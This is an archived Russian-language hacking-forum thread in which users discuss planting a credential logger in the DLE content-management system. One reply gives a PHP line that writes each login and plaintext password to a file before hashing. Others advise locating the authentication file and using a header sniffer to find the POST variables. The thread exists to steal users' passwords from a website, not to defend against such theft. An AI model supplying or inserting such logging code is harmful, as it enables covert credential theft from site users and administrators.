PDA

Просмотр полной версии : Сниффер в движок DLE


Edward007
12.04.2016, 00:39
В общем, суть вопроса такая:

Вот сайт с описанием данной штуки: http://krober.biz/?p=1239

Перед тем как читать дальше, клацните на ссылку выше.

Как сделать так, чтобы при любой авторизации записывался в файл логин и пароль? (Без MD5, то есть чистый пароль)

С этим кодом, получается подобная штука:

http://i.imgur.com/T5xDgRR.png

Я точно не знаю, эти цифры 200: из-за чего они, и должно ли быть так.

Logan22
12.04.2016, 21:34
В CMS ищешь файл где происходит авторизация пользователя или админа и записываешь данные до хэширования пароль.

типо так file_put_contents('logpass.txt', $login.':'.$password);

Всё.

Edward007
14.04.2016, 05:45
↑ (https://antichat.live/posts/3973076/)
В CMS ищешь файл где происходит авторизация пользователя или админа и записываешь данные до хэширования пароль.
типо так file_put_contents('logpass.txt', $login.':'.$password);
Всё.


Тк я искал тот самый файл, и чёт не нашел...

blackbox
14.04.2016, 10:22
↑ (https://antichat.live/posts/3973483/)
Тк я искал тот самый файл, и чёт не нашел...


C наскоку не получится, тут нужно хотя бы основы php знать и примерно понимать как устроен движок, чтобы в правильном месте код модифицировать чтобы он сохранял. Так что выводы напрашиваются сами.

LETIFERUM
14.04.2016, 13:27
↑ (https://antichat.live/posts/3972784/)
В общем, суть вопроса такая:
Вот сайт с описанием данной штуки:
http://krober.biz/?p=1239
Перед тем как читать дальше, клацните на ссылку выше.

К
ак сделать так, чтобы при любой авторизации записывался в файл логин и пароль? (Без MD5, то есть чистый пароль)
С этим кодом, получается подобная штука:
http://i.imgur.com/T5xDgRR.png
Я точно не знаю, эти цифры 200: из-за чего они, и должно ли быть так.


200 это результат запроса скорее всего,не?тоже самое как возвращается 404 итд итп


///////Конец нашей вставки//////////
$is_loged_in=true;
$dle_login_hash=md5(SECURE_AUTH_KEY.$_SERVER['HTTP_HOST'] .$member_id['user_id'] .sha1($cmd5_password) .$config['key'] .date("Ymd"));
if (!$_SESSION['dle_user_id'] and$_COOKIE['dle_user_id']) {
session_regenerate_id();
$_SESSION['dle_user_id'] =$_COOKIE['dle_user_id'];
$_SESSION['dle_password'] =$_COOKIE['dle_password'];
}

нафиг эта часть кода тебе?или я не прав?

Edward007
15.04.2016, 16:55
↑ (https://antichat.live/posts/3973505/)
C наскоку не получится, тут нужно хотя бы основы php знать и примерно понимать как устроен движок, чтобы в правильном месте код модифицировать чтобы он сохранял. Так что выводы напрашиваются сами.


Основы пыха я и так знаю... Попробую поискать ещё раз.

ol1ver
17.04.2016, 03:22
Используй снифер заголовков. Как минимум можно узнать название post переменному сделать её поиск по исходникам, дальше плясать